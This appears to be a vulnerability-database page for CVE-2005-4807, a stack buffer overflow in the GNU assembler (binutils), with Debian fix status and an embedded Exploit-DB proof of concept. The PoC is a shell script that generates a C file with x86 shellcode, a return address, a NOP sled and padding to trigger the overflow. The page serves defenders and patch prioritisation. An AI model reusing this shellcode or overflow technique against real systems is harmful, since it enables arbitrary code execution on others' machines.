CVE-2005-4807

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Stack-based buffer overflow in the as_bad function in messages.c in the GNU as (gas) assembler in Free Software Foundation GNU Binutils before 20050721 allows attackers to execute arbitrary code via a .c file with crafted inline assembly code.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-28397 remote linux verified c · 1 KB

Tavis Ormandy · 2006-08-17

GNU BinUtils 2.1x - GAS Buffer Overflow

c exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/19555/info

GNU binutils GAS (GNU assembler) is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

Remote attackers may crash the application or execute arbitrary machine code in the context of the application.

#!/bin/sh
#
# gas overflow poc, <taviso@gentoo.org>

returnaddr='\xc4\xea\xff\xbf'
shellcode='\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff/bin/id'

printf '#include <stdio.h>\n'
printf '#define EGG "%s"\n' "$shellcode"
printf '#define RET "%s"\n' "$returnaddr"
printf '#define NOP "%s"\n' "`perl -e 'print "\\\x90"x100'`"
printf '#define PAD "%s"\n' "`perl -e 'print "A"x1990'`"

cat << __EOF__
#include <stdio.h>

int main (int argc, char **argv)
{
	        __asm__ (PAD RET NOP EGG);
}
__EOF__

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`2.17-1`
sid	Fixed	`2.17-1`
forky	Fixed	`2.17-1`
bullseye	Fixed	`2.17-1`
bookworm	Fixed	`2.17-1`

References

https://security-tracker.debian.org/tracker/CVE-2005-4807

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.